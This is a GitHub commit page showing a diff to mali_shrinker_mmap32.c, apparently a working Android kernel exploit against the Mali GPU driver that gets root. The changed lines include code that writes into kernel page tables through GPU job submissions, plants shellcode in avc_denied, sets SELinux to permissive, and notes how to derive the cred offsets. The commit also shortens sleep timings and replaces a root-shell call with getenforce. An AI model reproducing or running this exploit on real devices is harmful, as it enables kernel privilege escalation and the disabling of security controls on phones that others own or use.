Update mali_shrinker_mmap32.c

Signed-off-by: Syuugo <[email protected]>
SmileTabLabo · Jun 20, 2024 · 53e715f · 53e715f
1 parent fb54f8f
commit 53e715f
Showing 1 changed file with 11 additions and 11 deletions.
diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
@@ -76,8 +76,8 @@ Search: sel_read_enforce ->
 SELINUX_ENFORCING = ldr - KERNEL_BASE
 
 Need: ARM to HEX
-ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED)
 ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
+ADD_COMMIT = add x8, x8, #0x(Last 3 digits of COMMIT_CRED)
 */
 
 /*
@@ -181,8 +181,8 @@ static uint64_t selinux_enforcing;
 
 //static uint64_t avc_deny = 0x2CCC28;
 static uint64_t avc_deny;
-static uint64_t selinux_enforcing_READ = 0X0;
-static uint64_t selinux_enforcing_WRITE = 0X0;
+static uint64_t selinux_enforcing_READ = 0x0;
+static uint64_t selinux_enforcing_WRITE = 0x0;
 /*
   Overwriting SELinux to permissive
   strb wzr, [x0]
@@ -634,7 +634,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
   if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
     err(1, "submit job failed\n");
   }
-  usleep(300000);
+  usleep(100000);
 }
 
 void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) {
@@ -651,15 +651,15 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u
         LOG("write_data overwrite addr : %llx %llx\n", overwrite_addr + data_offset, data_offset);
         curr_overwrite_addr = overwrite_addr;
         write_to(mali_fd, overwrite_addr + data_offset, value, atom_number++, type);
-        usleep(300000);
+        usleep(100000);
       }
     }
   }
 }
 
 void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
   printf("write_func called with code_size = %llu\n", code_size);
-  usleep(300000);
+  usleep(100000);
   uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
   uint64_t curr_overwrite_addr = 0;
   for (int i = 0; i < size; i++) {
@@ -675,7 +675,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u
         for (int code = code_size - 1; code >= 0; code--) {
           write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
         }
-        usleep(300000);
+        usleep(100000);
       }
     }
   }
@@ -684,7 +684,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u
 int run_enforce() {
   char result = '2';
   printf("run_enforce: before sleep\n");
-  sleep(3);
+  sleep(2);
   printf("run_enforce: after sleep\n");
   int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
   printf("run_enforce: open\n");
@@ -712,7 +712,7 @@ int run_enforce_write() {
 int run_enforce_un() {
   char result = '2';
   printf("run_enforce_un: before sleep\n");
-  sleep(3);
+  sleep(2);
   printf("run_enforce_un: after sleep\n");
   int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY);
   printf("run_enforce_un: open\n");
@@ -803,7 +803,7 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
   uint64_t selinux_enforcing_addr = (((selinux_enforcing + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
-  usleep(300000);
+  usleep(100000);
   // Go through the reserve pages addresses to write to avc_denied with our own shellcode
   write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
@@ -947,7 +947,7 @@ int main() {
   int flush_idx = 0;
   for (int i = 0; i < 10; i++) {
     if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
-      system("sh");
+      system("getenforce");
       break;
     }
   }